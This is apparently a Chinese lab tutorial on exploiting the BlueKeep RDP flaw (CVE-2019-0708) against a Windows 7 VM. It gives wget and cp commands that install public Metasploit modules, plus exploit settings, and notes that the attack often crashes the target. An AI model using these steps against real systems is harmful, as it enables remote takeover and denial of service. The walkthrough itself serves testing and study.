0x01
首先是靶機,這里的靶機是使用清水表哥提供的win7sp1的系統
漏洞環境
使用VM安裝Windows7 SP1模擬受害機
Windows7 SP1下載鏈接:ed2k://|file|cn_windows_7_ultimate_with_sp1_x64_dvd_u_677408.iso|3420557312|B58548681854236C7939003B583A8078|/
如果用上面的系統,vm虛擬機安裝的時候默認是家庭版的,所以在安裝的時候要選擇一下。
安裝好如下:
0708漏洞利用方式是通過遠程桌面端口3389,RDP協議進行攻擊的。所以3389端口當然要打開啦。
靶機工作完成。
0x02
攻擊機我這里用的是kali里面的msf,而且msf我以前有卸載了重新安裝過。
所以我先看看我msf安裝的路徑在哪里。
find / -name 'metasploit'
我的路徑是安裝在/opt目錄下。
首先,我們需要下載好攻擊套件放置文件到msf的相應文件夾(如果已存在同名文件,直接覆蓋即可)
wget https://raw.githubusercontent.com/rapid7/metasploit-framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/lib/msf/core/exploit/rdp.rb
wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/rdp_scanner.rb
wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb
wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb
下載下來后,直接復制到對應的路徑。
cp rdp.rb /opt/metasploit-framework/embedded/framework/lib/msf/core/exploit/
cp rdp_scanner.rb /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/
如果這里沒有rdp目錄,就用mkdir命令創建一個rdp目錄cp cve_2019_0708_bluekeep_rce.rb /opt/metasploit-framework/embedded/framework/modules/exploits/rdp/
cp cve_2019_0708_bluekeep.rb /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp/
這時啟動msf。
更新一下msf
更新以后使用reload_all重新加載0708rdp利用模塊
use exploit/rdp/cve_2019_0708_bluekeep_rce
主要設置的參數有RHOSTS / RPORT / target
* RHOSTS 靶機ip
* RPORT rdp端口
* target ID數字(可選為0-4)設置受害機機器架構
0x03
攻擊成功如下圖
但這是要看運氣的,十次里面可能有一兩次才會反彈shell,大部分只會造成藍屏。
參考連接:http://www.nmd5.com/?p=409